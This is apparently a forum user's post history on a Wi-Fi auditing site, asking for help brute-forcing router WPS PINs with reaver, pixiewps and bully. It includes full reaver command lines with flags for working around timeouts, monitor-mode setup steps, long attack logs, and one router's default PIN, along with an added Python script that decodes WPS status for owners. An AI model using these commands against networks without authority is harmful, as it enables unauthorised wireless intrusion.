Free thought for a free internet

#1 General questions and search for new breaches » reaver at 99% ...and no further » 21-05-2018 23:02:13

troh
Replies: 1

Hello, I have to turn to you because I need someone to point me in the right direction.
It turns out I'm testing a modem that is in for repair: cleaning it, resetting it and reconfiguring it. It occurred to me to run reaver against it:

reaver -i wlan0 -b B0:48:7A:98:xx:xx -c 9 -vv -N -T 12 -t 12

Modem according to wash, Vendor: AtherosC:

modem wrote:

{"bssid" : "B0:48:7A:98:xx:xx", "essid" : "mi modem", "channel" : 9, "rssi" : -94, "vendor_oui" : "00037F", "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "TP-LINK", "wps_model_name" : "TL-WR841N", "wps_model_number" : "6.0/7.0", "wps_device_name" : "Wireless Router TL-WR841N", "wps_serial" : "1.0", "wps_uuid" : "00000000000010000000b0487a98a47e", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0086", "wps_rf_bands" : "01", "dummy": 0}

Googling, I came across the pin 8705, which I started from, getting up to 87059984, and there I die at 99.99%

The question is: what did I do wrong (or how many things did I do wrong)?

Kali Linux + reaver 1.6.4 + ralink 3070 or rtl8812au (same result). It is not vulnerable to pixiewps.

Being a noob, I even started using other arguments to see if I got lucky.....

[email protected]:~# reaver -i wlan0 -b B0:48:7A:98:xx.xx -c 9 -vv -N -L -S -T 20 -t 20 -E -J

Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1 to channel 9
[?] Restore previous session for B0:48:7A:98:xx:xx? [n/Y] 
[+] Restored previous session
[+] Waiting for beacon from B0:48:7A:98:xx:xx
[+] Received beacon from B0:48:7A:98:xx:xx
[+] Vendor: AtherosC
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2018-05-21 17:56:01 (40 seconds/pin)
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "87059984"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B0:48:7A:98:xx:xx (ESSID: MI MODEM)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

Any hint is appreciated ^^
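
The wash record quoted in the post above, decoded field by field the way an AP owner would when checking what a router advertises about WPS. This is an added example, not part of the original post and not code from reaver or wash; the function names are hypothetical, the record is a subset of the fields in the post, and the reading of `wps_locked` (1 = locked, 2 = not locked) is an assumption about wash's JSON output.

```python
import json

# Subset of the wash record quoted in post #1 (MAC already masked by the poster).
WASH_LINE = (
    '{"bssid" : "B0:48:7A:98:xx:xx", "essid" : "mi modem", "channel" : 9, '
    '"wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, '
    '"wps_manufacturer" : "TP-LINK", "wps_model_name" : "TL-WR841N", '
    '"wps_config_methods" : "0086", "wps_rf_bands" : "01"}'
)

# Config Methods bit flags from the Wi-Fi Simple Configuration (WSC) 1.0 spec.
CONFIG_METHODS = {
    0x0001: "USBA",
    0x0002: "Ethernet",
    0x0004: "Label",
    0x0008: "Display",
    0x0010: "External NFC Token",
    0x0020: "Integrated NFC Token",
    0x0040: "NFC Interface",
    0x0080: "PushButton",
    0x0100: "Keypad",
}
RF_BANDS = {0x01: "2.4 GHz", 0x02: "5 GHz"}
WPS_STATE = {1: "not configured", 2: "configured"}
# Assumption: wash prints 1 when "AP Setup Locked" is set and 2 when it is not.
WPS_LOCKED = {1: True, 2: False}


def decode_version(raw):
    """Version is one byte: high nibble major, low nibble minor (16 == 0x10)."""
    return f"{raw >> 4}.{raw & 0x0F}"


def decode_flags(hex_str, table):
    """Turn a hex bitmask string into the list of flag names it contains."""
    value = int(hex_str, 16)
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)  # bits this table does not describe
    if unknown:
        names.append(f"unknown(0x{unknown:04x})")
    return names


def assess(line):
    """Decode one wash JSON line and list what the owner should review."""
    rec = json.loads(line)
    methods = decode_flags(rec["wps_config_methods"], CONFIG_METHODS)
    locked = WPS_LOCKED.get(rec["wps_locked"])  # None if the value is unknown
    findings = []
    if locked is False:
        findings.append("AP Setup Locked is not set: PIN attempts are accepted")
    if "Label" in methods:
        findings.append("Label (static PIN) method advertised: disable WPS PIN")
    if "PushButton" in methods:
        findings.append("PushButton advertised: keep only with physical control")
    return {
        "model": f'{rec["wps_manufacturer"]} {rec["wps_model_name"]}',
        "version": decode_version(rec["wps_version"]),
        "state": WPS_STATE.get(rec["wps_state"], "unknown"),
        "locked": locked,
        "methods": methods,
        "bands": decode_flags(rec["wps_rf_bands"], RF_BANDS),
        "findings": findings,
    }


if __name__ == "__main__":
    report = assess(WASH_LINE)
    for key, value in report.items():
        print(f"{key}: {value}")
```
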

#2 Re: Handshake capture and general questions » WPA3 launch in 2018: the end of the dictionary attack? » 30-04-2018 00:03:20

Very interesting, really, but I think at least a good couple of years will pass before they become widespread.
I hope that in that time evil twin attacks get improved.
Human error is something that can't be avoided. I know it's not much, but it's better than nothing.

#3 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 12-04-2018 23:38:51

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 166 ms

Too bad I seem to be the only active one in this section of the forum. :/

#4 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 21-03-2018 20:27:50

[email protected]:~# cat /tmp/reaver.log | python logfilter.py

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 207 ms

#5 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 14-03-2018 15:10:32

One more (?)

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 191 ms

#6 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 31-01-2018 14:49:34

Vendor broadcom:

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 286 ms

#7 Re: Tools for WPS attack » Bug reports in reaver 1.6.4 » 26-01-2018 14:27:56

Lucky you have the time to make it crash; for me it's impossible. :/
But in the end, I get the same errors as you after updating reaver and pixiewps in Kali. And it fails for me on both an rtl8187l and the ralink 3070.

#8 Re: Tools for WPS attack » Bug reports in reaver 1.6.4 » 24-01-2018 15:03:34

[email protected]:~# airmon-ng
PHY	Interface	Driver		Chipset
phy0	wlan0		rtl8187		Realtek Semiconductor Corp. RTL8187
phy1	wlan1		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

That is, -vvv lands me in long errors, while something like -vv simply ends in:

[+] Sending authentication request
[!] WARNING: Receive timeout occurred
[+] Sending authentication request
[!] WARNING: Receive timeout occurred
[+] Sending authentication request

#9 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 12-01-2018 18:29:51

From the modem's web config it is enabled. I didn't find a "configured" option in admin.html.
I also didn't find how to change the pin, even though I looked at a couple of online manuals for this TG588v.
Which leads me to think the same as you: that the ISP already protects it (which seems incredible to me coming from arnet) or that reaver has some bug or whatever that makes it fall into a loop of 0x03 and 0x04 errors even when given the correct pin.

#10 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 12-01-2018 13:49:09

No luck using wpa_cli either; I never receive an M3 and/or higher.
I'm attaching log fragments in case they're of any use.
https://workupload.com/file/vEjK6kZ

#11 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 12-01-2018 00:34:40

No problem!
I'll tell you that I couldn't recover the pass of the technicolor TG588v with the arguments you gave me.

add -N -g 1 -vvv

A pity, the vendor of that modem is broadcom and I'm quite interested in those.

#12 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 10-01-2018 19:51:12

phy0	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

Technicolor DPC3848VE DOCSIS 3.0 Gateway (vendor Atheros according to a wash -i wlan0 P)

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 6 s 853 ms

When I get the chance I'll run it again with the -g 1 flag that I missed at the time. ;)

As a fun fact, I want to mention that in Kali this ralink chipset works much better with reaver than my other realtek 8812au cards or the rtl8187l itself.

#13 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 10-01-2018 15:58:05

I'm going nuts!
I have a Technicolor TG588 (C4:EA:1D), broadcom chipset, whose default pin is 62059237
And I can't figure out how to get reaver to bring back the necessary data with the pass. I tried a ton of flags and I'm left dead at 90.91%. :/ :|

#14 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 10-01-2018 12:57:59

device: VMG1312-B10B, broadcom chip according to wash.

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 

 Pixiewps 1.3

 [-] WPS pin not found!

 [*] Time taken: 0 s 82 ms

#15 Re: Wireless, Internet, Networks and Hacking » fluxion » 09-01-2018 23:05:27

Sorry boss, I didn't mean to change the subject about fluxion. I only commented that wifimosys worked better for me.
I followed your advice on some points but it doesn't recognize the rtl8812au driver to put it in monitor mode and start scanning.

I guess a thread will have to be opened.
Regards!

#16 Re: Wireless, Internet, Networks and Hacking » fluxion » 09-01-2018 19:46:12

If you look closely at the sentence, you'll see I was talking about wifimosys. lol

#17 Re: Study of algorithms and collection of generic PINs » Contribute data to the research on new attacks in pixiewps » 09-01-2018 00:00:52

Let's see if I did it right:

[email protected]:~# cat /tmp/reaver.log | python2 logfilter.py 

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 6 s 719 ms

#18 Re: Wireless, Internet, Networks and Hacking » fluxion » 08-01-2018 23:28:15

It's beside the point, but related to evil twin, I love wifimosys compared to fluxion.
Too bad it's impossible for me to port it to kali.

#19 Re: General questions and search for new breaches » WPS PBC (Push button) vulnerability » 27-12-2017 23:27:38

Sorry for bumping this, but I saw it on another forum and I'm already trying it.
I have no idea if it still works, but I lose nothing by trying.

#20 Re: General questions and search for new breaches » Understanding the 0x0 errors in reaver... » 27-12-2017 01:03:12

There was no point continuing the other thread because, as you can see, I managed to solve it when I had already given up. :D


@kcdtv I already looked at bully's help, but what are the arguments to increase the delay and the timeout? I don't quite get them well enough to at least give it a chance.
About the errors I mention in bold and in colors: it's because I suffered them a few days ago at my brother's house; I had to install RAM for him and reformat his Windows, so I took the chance to bring my notebook and hammer his modem with his consent haha.
It's a Technicolor TG588, VDSL (according to wash, broadcom chip).
It was impossible to get anywhere with it by brute force with reaver.

Thanks to everyone and happy new year! biere

#21 General questions and search for new breaches » Understanding the 0x0 errors in reaver... » 26-12-2017 12:31:28

troh
Replies: 4

Hello everyone! Once again I come so the masters of the field can throw a bit of water on me to see if I wake up. :lol:

It turns out that when launching reaver, in 90% of cases I can't start a brute-force attack because reaver simply enters the loop of these errors that I mention below (which I found by googling)

[!] WPS transaction failed (code: 0x02), re-trying last pin - there was no response from the router (timeout)
[!] WPS transaction failed (code: 0x03), re-trying last pin - packets in the wrong order and without a proper response
[!] WPS transaction failed (code: 0x04), re-trying last pin - the router replied that it doesn't want to talk to us

To give you an idea, I managed to fix the testing of a pin as in this example:
https://www.wifi-libre.com/topic-955-te … html#p8335

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -T 7 -t 7 -vvv

After googling for a good couple of hours, I found that by adding a couple of extra arguments I was able to fix the problem and make reaver work as it should.

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -T 7 -t 7 -d 5 -w -N -vv

I ran it twice; the 1st time I got the key in 5 seconds and the 2nd it took 92 seconds.

Now, the trillion-dollar question is: how to deal with these errors and not die trying? I noticed that error 0x04 tends to appear often with WPS 2.0, that is, the newer devices are the ones that least "want to talk to us"?
I understand there are several factors at play, such as the distance to the AP, whether the router is vulnerable or not, the driver of the USB card used for auditing, and other variables I probably have no idea about.
For those who know, can this situation be improved? Are there similar arguments when we run bully and hit the same obstacles?
Anyway, if you don't mind, I leave my questions to the masters of the forum. ;)

Regards and happy holidays to all!!

#22 Re: General questions and search for new breaches » Pin testing without returning the key » 05-12-2017 00:40:50

Where do I see the ralink output? I didn't even notice.
I assume it's an rtl8812au because Linux detects and installs it as such, and even Windows 10 picks it up with that driver.

I also tried with my other little antennas, one with an rtl8187 chip and another with ralink3070, same result.

#23 Re: General questions and search for new breaches » Pin testing without returning the key » 04-12-2017 21:33:06

Thanks for replying. ;)

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -T 7 -t 7 -vvv

Unfortunately, I'm still in the same loop (or I typed the command wrong :P). And I didn't increase the power this time.

@kcdtv; when I run airmon-ng check kill it kills the dhclient and wpa_supplicant processes, then I continue with the others as I detailed above.
And about the card, I also mentioned it above: it's not an AWUS1900 but an EDUP I bought on ALI with an rtl8812au chip.
http://www.szedup.com/product-item/ac-1 … b-adapter/

#24 Re: General questions and search for new breaches » PIN test not returning the key » 03-12-2017 23:21:22

The original MAC is edited; I put in random numbers.
As for wlan0, I thought I had left all the info about the USB device I use.
In fact, I follow each step from the git to make it work:

# airmon-ng check kill
# ip l s wlan0 down
# iw dev wlan0 set type monitor
# ip l s wlan0 up
# iwconfig wlan0 txpower 30

#25 Re: General questions and search for new breaches » PIN test not returning the key » 03-12-2017 17:00:22

Here is some extra data, such as the test environment.
- Windows 10 Pro x 64
- VMWare Workstation 14.0.0
- Kali Linux 2017.3 x64
- EDUP usb wifi adapter 1200mbps 5ghz high gain wifi antenna 802.11ac long distance wifi receiver usb 3.0 wi-fi ethernet adapter (20 USD)
- Drivers installed from the git that was posted here, post #19

https://www.wifi-libre.com/topic-808-error-compilando-drivers-awus1900-rtl8814au.html

- I didn't use airmon-ng; I put the card in monitor mode using iw dev

[email protected]:~# reaver -i wlan0 -b 00:C0:CA:xx:xx:xx -c 9 -p 17871327 -vvv 

Reaver v1.6.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0 to channel 9
[+] Waiting for beacon from 00:C0:CA:xx:xx:xx
[+] Received beacon from 00:C0:CA:xx:xx:xx
[+] Vendor: AtherosC
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "17871327"
[+] Associated with 00:C0:CA:xx:xx:xx (ESSID: inalambrica)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 90.91% complete @ 2017-12-03 10:46:50 (0 seconds/pin)
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 37 38 37 31 33 32 37                           17871327        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed

This happened in the first few minutes; then I stopped it.
